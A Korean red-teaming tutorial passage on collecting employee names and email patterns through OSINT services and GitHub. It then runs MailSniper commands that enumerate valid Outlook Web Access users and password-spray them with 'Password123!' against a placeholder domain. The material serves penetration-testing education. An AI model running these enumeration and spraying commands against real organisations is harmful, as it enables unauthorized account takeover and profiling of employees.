Employees

모의해킹에서는 취약점을 찾으면 해당 취약점을 통한 후속 공격으로 이어가는 경우는 거의 없기 때문에 OSINT를 통한 임직원 정보 수집에 대한 중요성이 부각되지는 않습니다. 반면 레드티밍에서는 외부망 해킹 때 발견되었던 로그인 페이지(로그인은 되지 않았더라도) 등의 정보들을 내부망에서 수집한 정보들과 연계하여 후속 공격을 이어가는 경우가 많기 때문에 임직원 정보는 중요합니다. 특히나 Active Directory와 같이 임직원들의 계정을 도메인 컨트롤러로 관리하는 경우, 대부분의 도메인 계정은 직원의 이름으로 사용되거나 사번/휴대폰 번호 뒷자리/출생년도와 같이 사용됩니다. 때문에 임직원의 실제 이름을 여러개 파악할 수록 다양한 공격에 활용이 가능하며 성공률이 높아집니다.

임직원 이름을 알아내는 방법은 대표적으로 이미 사전에 수집된 정보들을 바탕으로 확인하는 방법과 SNS(링크드인, 티스토리 등)에 노출된 정보들을 수집하는 방법 2가지로 구분할 수 있습니다.

Email

서브 도메인을 찾을 때 기존에 수집되었던 정보들을 바탕으로 검색하는 사이트들이 있듯이 여러 기업에 존재하는 임직원 이메일 혹은 전화번호 등을 수집하는 사이트들 또한 존재합니다.

hunter의 경우 이메일 정보가 무료 회원도 열람이 되는 대신, 무료로 열람 가능한 임직원 수 자체가 제한되어 단순히 이메일이 아닌 전체 임직원에 대한 이름을 수집하고자 할 때는 유용한 도구는 아닙니다.

반면 Clodura의 경우 전체 사용자에 대한 제한적 정보 조회는 가능한 대신 이메일 조회는 유료 회원만 가능합니다. 때문에 내가 수집하고자 하는 정보가 임직원의 이메일 패턴이라면 hunter.io를 통해 수집을 하며,

획득한 사내 메일 패턴을 통해 직접 메일 목록을 만들 때는 Clodura에서 이름을 수집하여 사용할 수 있습니다.

Github

구글 도킹을 통해 깃허브에 존재하는 회사 프로젝트를 검색한 뒤, 기여자 목록에서 임직원을 찾을 수 있습니다.

Password Spraying

수집한 임직원의 이메일을 통해 해당 이메일이 유효한지에 대한 블라인드 테스트와, 스프레이 공격이 가능합니다. Office 365인 OutLook을 통해 진행하는 유저 정보 열거 공격 도구로는 MailSniper를 사용합니다.

# MailSniper 설치
wget https://raw.githubusercontent.com/dafthack/MailSniper/refs/heads/master/MailSniper.ps1 -Outfile MailSniper.ps1

# MailSniper 스크립트 실행 후 모듈 로드
impo .\MailSniper.ps1

# 유저 이메일 목록 열거
Invoke-UsernameHarvestOWA -ExchHostname mail.wiki.com -Domain wiki.com -UserList emailList.txt -Outfile validEmailList.txt

# 유효한 유저 목록 반환 후, 해당 유저에 대해 Password123! 패스워드 스프레이 공격
Invoke-PasswordSprayOWA -ExchHostname mail.wiki.com -UserList validEmailList.txt -Password Password123!

해당 공격은 이메일에 대한 보안 정책과 수준에 따라 결과가 다르게 나타나므로 무조건적인 신뢰는 나쁘며

스프레이 공격 또한 2FA, CAPCHA 등의 추가 절차가 있다면 실패한다는 것을 명심해야 합니다.